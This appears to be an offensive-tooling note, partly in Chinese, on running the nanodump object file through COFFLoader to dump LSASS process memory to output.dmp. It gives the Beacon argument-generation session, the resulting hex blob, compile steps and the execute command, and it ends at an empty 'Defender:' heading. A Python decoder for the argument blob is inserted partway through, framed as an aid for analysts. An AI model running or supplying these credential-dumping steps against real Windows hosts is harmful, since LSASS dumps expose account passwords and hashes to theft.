Project:
https://github.com/trustedsec/COFFLoader
Generate the argument blob:
python3 beacon_generate.py
Beacon Argument Generator
Beacon>addint lsass进程ID
Beacon>addString output.dmp
Beacon>addint 1
Beacon>addint 1
Beacon>addint 0
Beacon>addint 1
Beacon>addint 0
Beacon>addint 0
Beacon>addint 0
Beacon>addint 0
Beacon>addint 0
Beacon>addint 0
Beacon>addString ""
Beacon>addint 0
Beacon>addint 0
Beacon>addint 0
Beacon>addString ""
Beacon>addint 0
Beacon>generate
b'59000000cc0200000b0000006f75747075742e646d700001000000010000000000000001000000000000000000000000000000000000000000000000000000030000002222000000000000000000000000000300000022220000000000'
Beacon>
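The blob printed by Beacon>generate is a length-prefixed, little-endian packing of the arguments in the order they were added. As an added example (not part of the original note or of the COFFLoader project), the Python below decodes such a blob back into values when the BOF's argument order is known, which is how an analyst can read what a recovered COFFLoader command line passed to the object file. The schema and the hex value are taken from the session above; the wstr branch (UTF-16LE) is assumed from the Beacon argument convention and is not exercised by the page's data.

```python
import struct

# Argument order from the Beacon> session above: one int (PID), one string,
# ten ints, one string, three ints, one string, one int.
PAGE_SCHEMA = ["int", "str"] + ["int"] * 10 + ["str"] + ["int"] * 3 + ["str", "int"]

# The Beacon>generate output from the page, split only for readability.
PAGE_HEX = (
    "59000000cc0200000b0000006f75747075742e646d7000"
    + "01000000010000000000000001000000"
    + "00000000" * 6
    + "03000000222200"
    + "00000000" * 3
    + "03000000222200"
    + "00000000"
)


def decode_bof_args(hex_blob, schema):
    """Decode a beacon_generate.py argument blob given the BOF's argument types.

    Layout: 4-byte LE total length, then each argument in order. int = 4-byte
    LE, short = 2-byte LE, str = 4-byte LE length followed by that many bytes
    (trailing NUL included), wstr = the same with UTF-16LE text (assumed).
    """
    buf = bytes.fromhex(hex_blob)
    (total,) = struct.unpack_from("<I", buf, 0)
    if total != len(buf) - 4:
        raise ValueError(f"length prefix {total} != payload size {len(buf) - 4}")
    off, values = 4, []
    for kind in schema:
        if kind == "int":
            (v,) = struct.unpack_from("<i", buf, off)
            off += 4
        elif kind == "short":
            (v,) = struct.unpack_from("<h", buf, off)
            off += 2
        elif kind in ("str", "wstr"):
            (n,) = struct.unpack_from("<I", buf, off)
            off += 4
            raw = buf[off:off + n]
            off += n
            if len(raw) != n:
                raise ValueError("string length runs past end of buffer")
            v = raw.decode("utf-16-le" if kind == "wstr" else "latin-1").rstrip("\0")
        else:
            raise ValueError(f"unknown argument type {kind!r}")
        values.append(v)
    if off != len(buf):
        raise ValueError(f"{len(buf) - off} trailing bytes not covered by schema")
    return values


if __name__ == "__main__":
    for kind, value in zip(PAGE_SCHEMA, decode_bof_args(PAGE_HEX, PAGE_SCHEMA)):
        print(f"{kind:5} {value!r}")
```

Decoding the page's blob gives PID 716 and the file name output.dmp; note that the two `""` entries decode to a two-character string of quote marks, because the quotes were typed literally into the generator rather than producing an empty string.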
Compile:
cd COFF-master
make
Drop to disk and execute:
COFFLoader64.exe go nanodump.x64.o 59000000cc0200000b0000006f75747075742e646d700001000000010000000000000001000000000000000000000000000000000000000000000000000000030000002222000000000000000000000000000300000022220000000000
Defender: